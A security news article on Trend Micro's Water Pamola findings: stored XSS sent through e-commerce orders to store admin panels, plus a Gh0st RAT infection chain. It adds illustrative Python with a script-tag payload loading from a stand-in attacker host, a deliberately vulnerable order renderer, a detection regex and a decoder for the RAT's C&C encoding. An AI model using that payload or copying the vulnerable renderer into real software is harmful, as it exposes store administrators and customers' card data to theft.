Trend Micro's cybersecurity team has described a threat campaign it dubbed "Water Pamola", in which attackers compromised e-commerce stores in Japan, Australia, and Europe. The group initially targeted victims with spam emails carrying malicious attachments. Trend Micro has been tracking the campaign since 2019.
Since early 2020 the attackers have changed tactics. Instead of sending spam, they now get malicious scripts executed when administrators view customer orders in the online store's admin panel, and they have narrowed their focus to victims located mainly in Japan.
The mechanism is a stored cross-site scripting (XSS) attack. Water Pamola searched for stores vulnerable to XSS and placed orders with an XSS payload embedded in the order data; the store saves the payload along with the order, and it runs when a store administrator or user opens that order in the management panel. Once running, the script connects to the attackers' server to download additional payloads.
“Water Pamola sent online shopping orders appended with a malicious XSS script to attack e-commerce administrators,” researchers wrote in a report this week.
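As an added illustration, not code from Trend Micro's report or from any affected store, the following Python sketch shows the class of admin-panel flaw described above: an order field rendered into the administrator's page without output encoding, the encoded rendering that neutralises the same payload, and a triage pass over already-stored orders. The order records, field names and the attacker hostname are constructed for the example.

```python
import html
import re

# Constructed sample: an order placed by the attacker, with a script tag in a
# free-text field that the storefront stores as-is. The hostname is a
# placeholder, not one from the report.
MALICIOUS_ORDER = {
    "order_id": 10423,
    "customer_name": '<script src="https://attacker.example/payload.js"></script>',
    "shipping_address": "1-2-3 Example-cho, Tokyo",
}

# Constructed ordinary order, used to show the safe renderer leaves normal
# data unchanged.
BENIGN_ORDER = {
    "order_id": 10424,
    "customer_name": "Yamada Hanako",
    "shipping_address": "4-5-6 Example-cho, Osaka",
}


def render_order_vulnerable(order):
    """Admin-panel table row built by string interpolation: stored XSS.

    Whatever the customer typed is written into the administrator's page
    verbatim, so a <script> in customer_name executes with the admin's
    session the moment the order is opened."""
    return (
        f"<tr><td>{order['order_id']}</td>"
        f"<td>{order['customer_name']}</td>"
        f"<td>{order['shipping_address']}</td></tr>"
    )


def render_order_safe(order):
    """Same row with HTML output encoding applied to every untrusted field.

    html.escape turns < > & " ' into entities, so the browser shows the
    payload as text instead of parsing it as markup."""
    return (
        f"<tr><td>{html.escape(str(order['order_id']))}</td>"
        f"<td>{html.escape(order['customer_name'])}</td>"
        f"<td>{html.escape(order['shipping_address'])}</td></tr>"
    )


# Markers for script-like content in stored fields (heuristic, case-insensitive).
SCRIPT_MARKERS = re.compile(
    r"<\s*script\b|javascript:|\bon[a-z]+\s*=|<\s*iframe\b",
    re.IGNORECASE,
)


def find_suspicious_orders(orders):
    """Hunt over stored orders for string fields carrying script-like content.

    Returns (order_id, field_name) pairs. This is a triage heuristic for data
    already in the database, not a substitute for output encoding: attackers
    can obfuscate past a regex, and the durable fix is in the renderer."""
    hits = []
    for order in orders:
        for field, value in order.items():
            if isinstance(value, str) and SCRIPT_MARKERS.search(value):
                hits.append((order["order_id"], field))
    return hits
```

Running the two renderers over MALICIOUS_ORDER shows the difference directly: the vulnerable row contains a live `<script>` element, the safe row contains `&lt;script ...&gt;`, and the benign order renders identically either way.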
The many scripts Trend Micro collected from the attacks had capabilities such as page grabbing, web shell infection, credential phishing, and malware delivery. The malware could steal personal information, including names, credit card numbers, card expiration dates, and card security codes.
The attackers' goal is likely financial gain, and the campaign resembles Magecart campaigns, the researchers say.
Trend Micro's researchers noted that the attackers did not target a specific e-commerce framework but any e-commerce store vulnerable to XSS.
Water Pamola used the XSS.ME attack framework, which helps attackers manage their attack scripts and the information they steal. The framework's source code is publicly available on many Chinese hacker forums.
The attackers used several methods to infect their victims. In one, the XSS script redirected victims to a fake Flash download site that ultimately dropped a malicious executable:
“AdobeAirFlashInstaller.exe (legitimate file) sideloads xerces-c_2_1_0.dll (patched legitimate file), which then sideloads ulibs.dll (malicious file). Ulibs.dll loads Adob.dll, which is a ZIP archive. After extracting the content of the Adob.dll zip archive, two legitimate and signed executable files are present and executed, and a similar sideloading process happens once more… At the end, the last payload of this infection chain is a variant of a Gh0st RAT. Communication with C&C uses sockets and is encrypted with simple SUB 0x46, XOR 0x19 encryption,” researchers explained.
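To give a concrete feel for the C&C encoding the researchers describe, here is an added Python example (not from Trend Micro's report) implementing the per-byte SUB 0x46, XOR 0x19 transform and its inverse, the kind of helper an analyst writes before decoding a capture. The order of the two operations (subtract first, then XOR) is assumed from the wording of the quote, and the sample message is constructed, not a real capture.

```python
SUB_CONST = 0x46
XOR_CONST = 0x19


def encode_c2(plaintext: bytes, sub: int = SUB_CONST, xor: int = XOR_CONST) -> bytes:
    """Per-byte SUB, then XOR. Operation order is assumed from the phrase
    'SUB 0x46, XOR 0x19'; the & 0xFF keeps the subtraction within a byte."""
    return bytes(((b - sub) & 0xFF) ^ xor for b in plaintext)


def decode_c2(ciphertext: bytes, sub: int = SUB_CONST, xor: int = XOR_CONST) -> bytes:
    """Inverse of encode_c2: undo the XOR first, then add the constant back."""
    return bytes(((b ^ xor) + sub) & 0xFF for b in ciphertext)


def encode_xor_then_sub(plaintext: bytes, sub: int = SUB_CONST, xor: int = XOR_CONST) -> bytes:
    """The other possible reading of the same description. Kept here to show
    that SUB and XOR do not commute: a decoder built with the wrong order
    produces garbage without any error."""
    return bytes(((b ^ xor) - sub) & 0xFF for b in plaintext)


# Constructed stand-in for a captured C&C message; the plaintext is invented
# for this example and is not taken from the report.
SAMPLE_PLAINTEXT = b"HOST=WS-ADMIN01;USER=shopadmin\r\n"
SAMPLE_CAPTURE = encode_c2(SAMPLE_PLAINTEXT)


def printable_ratio(buf: bytes) -> float:
    """Fraction of bytes that are printable ASCII or common whitespace.

    A cheap sanity check when trying a decoder against unknown traffic: the
    encoded bytes score low, a correct decode of a text command scores 1.0."""
    if not buf:
        return 0.0
    ok = sum(1 for b in buf if 0x20 <= b < 0x7F or b in (0x09, 0x0A, 0x0D))
    return ok / len(buf)
```

Because the transform is a fixed per-byte substitution with no key schedule, the same constants apply to every message, and the printable-ratio check is enough to confirm which operation order a given sample actually uses.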
Water Pamola also conducted social engineering attacks to phish user credentials or lure victims into downloading a remote access tool. Indicators of compromise are listed in Trend Micro's report.